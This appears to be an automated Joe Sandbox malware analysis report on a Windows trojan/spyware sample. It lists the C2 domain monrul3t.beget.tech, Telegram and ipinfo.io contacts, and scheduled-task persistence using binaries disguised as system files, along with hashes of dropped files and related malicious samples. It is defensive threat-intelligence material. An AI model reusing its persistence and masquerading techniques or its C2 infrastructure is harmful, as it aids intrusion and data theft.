                                            https://www.ecosia.org/newtab/Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                                              		high
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brIdle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://ns.a.0/sTy#nIdle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://support.mozilla.org/products/firefoxIdle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://monrul3t.beget.techIdle.exe, 0000001E.00000002.4123458318.00000000028B6000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://ac.ecosia.org/autocomplete?q=Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                                                    		high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallIdle.exe, 0000001E.00000002.4141030211.0000000012AC3000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012B68000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchIdle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                                                        		high
                                                        http://ns.adoraw-se#nIdle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://support.mozilla.orgIdle.exe, 0000001E.00000002.4141030211.0000000012CE0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012CD8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ns.adobe.hotosh#nIdle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesIdle.exe, 0000001E.00000002.4141030211.0000000012AC3000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012B68000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSystem.exe, 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                149.154.167.220
                                                                		api.telegram.orgUnited Kingdom
                                                                		62041TELEGRAMRUfalse
                                                                5.101.152.15
                                                                		monrul3t.beget.techRussian Federation
                                                                		198610BEGET-ASRUtrue
                                                                34.117.59.81
                                                                		ipinfo.ioUnited States
                                                                		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1589210
                                                                Start date and time:2025-01-11 18:06:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 11m 29s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:43
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:6uPVRnocVS.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:7a193e404a6285a41aba3019479d1749.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@44/47@3/3
                                                                EGA Information:
                                                                • Successful, ratio: 16.7%
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                • Exclude process from analysis (whitelisted): Conhost.exe, upfc.exe
                                                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target Idle.exe, PID 2944 because it is empty
                                                                • Execution Graph export aborted for target Idle.exe, PID 4476 because it is empty
                                                                • Execution Graph export aborted for target System.exe, PID 3604 because it is empty
                                                                • Execution Graph export aborted for target lmXqPxTfNHomnnafzTOKZnFns.exe, PID 1704 because it is empty
                                                                • Execution Graph export aborted for target lmXqPxTfNHomnnafzTOKZnFns.exe, PID 5324 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                12:07:16API Interceptor3474776x Sleep call for process: Idle.exe modified
                                                                17:07:08Task SchedulerRun new task: Idle path: "C:\Recovery\Idle.exe"
                                                                17:07:08Task SchedulerRun new task: IdleI path: "C:\Recovery\Idle.exe"
                                                                17:07:08Task SchedulerRun new task: lmXqPxTfNHomnnafzTOKZnFns path: "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
                                                                17:07:08Task SchedulerRun new task: lmXqPxTfNHomnnafzTOKZnFnsl path: "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
                                                                17:07:08Task SchedulerRun new task: upfc path: "C:\Recovery\upfc.exe"
                                                                17:07:08Task SchedulerRun new task: upfcu path: "C:\Recovery\upfc.exe"
                                                                17:07:08Task SchedulerRun new task: WmiPrvSE path: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe"
                                                                17:07:08Task SchedulerRun new task: WmiPrvSEW path: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe"
                                                                17:07:10Task SchedulerRun new task: WinStore.App path: "C:\Windows\LiveKernelReports\WinStore.App.exe"
                                                                17:07:10Task SchedulerRun new task: WinStore.AppW path: "C:\Windows\LiveKernelReports\WinStore.App.exe"

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                149.154.167.220Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                        h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                              c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    5.101.152.15VDoUCMbcmz.exeGet hashmaliciousDCRatBrowse
                                                                                      00DsMTECub.exeGet hashmaliciousDCRatBrowse
                                                                                        jmBb9uY1B8.exeGet hashmaliciousDCRatBrowse
                                                                                          oFAjWuoHBq.exeGet hashmaliciousDCRatBrowse
                                                                                            34.117.59.810t8amSU3vd.exeGet hashmaliciousCryptoWall, TrojanRansomBrowse
                                                                                            • ipinfo.io/ip
                                                                                            file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                            • ipinfo.io/json
                                                                                            Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                            • ipinfo.io/json
                                                                                            idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                            • ipinfo.io/json
                                                                                            FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            ipinfo.ioUdzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 34.117.59.81
                                                                                            0t8amSU3vd.exeGet hashmaliciousCryptoWall, TrojanRansomBrowse
                                                                                            • 34.117.59.81
                                                                                            z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                            • 34.117.59.81
                                                                                            h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                            • 34.117.59.81
                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                            • 34.117.59.81
                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                            • 34.117.59.81
                                                                                            DownloadedMessage.zipGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 34.117.59.81
                                                                                            Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                            • 34.117.59.81
                                                                                            Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                            • 34.117.59.81
                                                                                            eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 34.117.59.81
                                                                                            api.telegram.orgUdzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                            • 149.154.167.220
                                                                                            h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRUUdzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                            • 149.154.167.220
                                                                                            h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            BEGET-ASRUcvXu2RR10n.exeGet hashmaliciousDCRatBrowse
                                                                                            • 5.101.153.201
                                                                                            VDoUCMbcmz.exeGet hashmaliciousDCRatBrowse
                                                                                            • 5.101.152.15
                                                                                            00DsMTECub.exeGet hashmaliciousDCRatBrowse
                                                                                            • 5.101.152.15
                                                                                            rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                                            • 45.130.41.107
                                                                                            jmBb9uY1B8.exeGet hashmaliciousDCRatBrowse
                                                                                            • 5.101.152.15
                                                                                            spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                            • 193.168.46.136
                                                                                            oFAjWuoHBq.exeGet hashmaliciousDCRatBrowse
                                                                                            • 5.101.152.15
                                                                                            Setup.exeGet hashmaliciousVidarBrowse
                                                                                            • 45.130.41.93
                                                                                            Setup.exeGet hashmaliciousVidarBrowse
                                                                                            • 45.130.41.93
                                                                                            xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                            • 5.101.153.57
                                                                                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGUdzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 34.117.59.81
                                                                                            https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                                            • 34.117.77.79
                                                                                            https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2Get hashmaliciousUnknownBrowse
                                                                                            • 34.117.77.79
                                                                                            https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                            • 34.117.112.1
                                                                                            0t8amSU3vd.exeGet hashmaliciousCryptoWall, TrojanRansomBrowse
                                                                                            • 34.117.59.81
                                                                                            https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                                                                                            • 34.117.77.79
                                                                                            z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                            • 34.117.59.81
                                                                                            h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                            • 34.117.59.81
                                                                                            mail (4).emlGet hashmaliciousUnknownBrowse
                                                                                            • 34.67.241.53
                                                                                            https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
                                                                                            • 34.66.73.214

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eUdzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            c2.htaGet hashmaliciousRemcosBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            kAsh3nmsgs.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\24dbde2999530e

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (351), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):351
                                                                                            Entropy (8bit):5.84600597303072
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mwYZvLUwCWRoSYCNxPQSht+4XVtWjXVIYx1+SADo8pCIXXM/dBPoC8pdWaqSvBi6:4hcWoSXfBy4XVqFt8pxXc/dAKnS5iWIu
                                                                                            MD5:E9FB402687901E2206FED4289C1600BA
                                                                                            SHA1:8049CEE73BD1D0526C90607A709C1ECFBFFBB5B4
                                                                                            SHA-256:63FDC6DE6FDBAF5BAD34CB19FD85369EF1E473B912D7284A92E5236E32F6F7F0
                                                                                            SHA-512:3E38F53067FFB3011AA2738EAE7556F7C95E952A5DA706CFB53A329DDBC5667B6300BBACE738BC38A65E720308A58C3B59ACB94FB5D5B49D1592643489874D31
                                                                                            Malicious:false
                                                                                            Preview:Xl4AIQFlUhdnxIXDbNNcGvZqKo1n3NsWQCqgPrGvYBM0NGk6DONQd7OmMNzeYbsHyHXuc0xtGbEFijdDD5kpAc2SxDUC1lW6SFBGtzeMbdJC3JEmuwad1DHWOE7Ygv1eEHwchWTObXOgS0Zn9rRFK3FP8p1o1Fppmp7vXlEXcMBdykDYpTYyewTLCgd2foWVsi4n2nQXn3m81laXlc9iq1LzVvt1IL2xzpvQqafCDBLkJVUbFGRCpyo0WESH4ZPbAzILzKqK77eppkqAbSvB4zHBB43mIYHovujUMIl5ZGFsT9LvXRpmnNgLrHK5QECiz035BWxTr0myuZrBtHO0sfBiNYmE7po

                                                                                            C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Program Files (x86)\Windows Sidebar\bc31d5a79a9161

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (682), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):682
                                                                                            Entropy (8bit):5.86808476624592
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:23CXfSzMhRLCdH4K9qpFSpwnnjuoMt03V+hBhF3hAv/RrJMXGb27Iw483p+I:2CmMhRLCInSpwnjuoMt03Khov/DWGb2T
                                                                                            MD5:19E78BD0E13E45BCE524BCA417FB8DEC
                                                                                            SHA1:90FA51CCE26B1631E84AEFFE7BFAB9626A977A86
                                                                                            SHA-256:33EF7354FEB04736086FAF41629A592E1245382F5CECCCD21ECAA84182909000
                                                                                            SHA-512:B85ABC33937DF3AE60AD41548E9693CCCA328B4BBA765E777B790E8C7A3FB3FBF8A8CC686BFFB57416CAA0DC5A43A323ABC806047D0E803179095B344463596F
                                                                                            Malicious:false
                                                                                            Preview:HARf4ocG7okDPhJVaNFG12gtQ2ETFE8nN0qSteVxeWbbOntZ6CSHCxyOdiOBjIA2q7zZ00m62SmfbEemJpWDw0kZBbyKPTNVVivQxUiGaVPuLTwZDl24w6GzXaXZBbriEQJ3TOzyHQnakzOrpZHnbTjYb52X6JE9nrp4J3FzwDwfTpPiLptmUEGvrvbXVb18Mow3JUiwTR0XgDEwpUMRZbojk4NYbreVMyTp2WY1H7SCNtOnqpsAPkiu9NTPGKUlxfLsuZ4T6VJbJmW0qjrw9dGmPippCJu7nqPsig2QuYE4aHkX1cigcimTZjcLuPQwkMycXnSKrbBlZMLI8SxkkNeFE5T9DqgfHRTOTI9NJYzBgA3MXTNbbqMXrtYbUSGA4feI27zzSkaMXdiEBGludEEaF6gkth30RzGBfvUaeXI0P99OKUaNrWh0aDC6aOGvqk4iXhiPwLPF5NLF7SZZHqJ5RPkcsXAPRXKpFa1nvKbgHb5N279IzqnAa9QH6GgYK9xhDgAgbvo6Ony0UXjvY2altJOGJtrpnCVHnXJV6cqDCrvwKawjgvASiMy3R4WrE8TMSqM7NOy5LWiCYb5t6HI2CCibjPECG89DXjeeOzVS6EHMnvfz8nv60aJPHuX7JvzMXfoy7beGv0585WxxuOEcNCN6ZPWdcYILP4zIGq

                                                                                            C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\bc31d5a79a9161

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):384
                                                                                            Entropy (8bit):5.820784120584832
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HiVPBmU/uMFyroXudnDwGphJhkhB+QJK7yUKIQSPr583c17kH2ctWCKHDu35YACZ:CpBhuKyXdk+fiB+c8K4983soWdC/35CZ
                                                                                            MD5:9F4CF51F7C736776D025C8D7C0241D96
                                                                                            SHA1:913AC31715F252FB5F071224EDBAE46F0888133D
                                                                                            SHA-256:600B4020C460C9E536461611BE43AC0780AC7BF6E0911D0C48889317E11AF8F5
                                                                                            SHA-512:5F172544871A29297BF2AF2A12BFB14ED23CB31B43417BAA06F1A14AD2CBAAB1050BE66A1018F17A9679391529E7AFDAE2BAA126D8CF965CD523A41EEC5EA3BA
                                                                                            Malicious:false
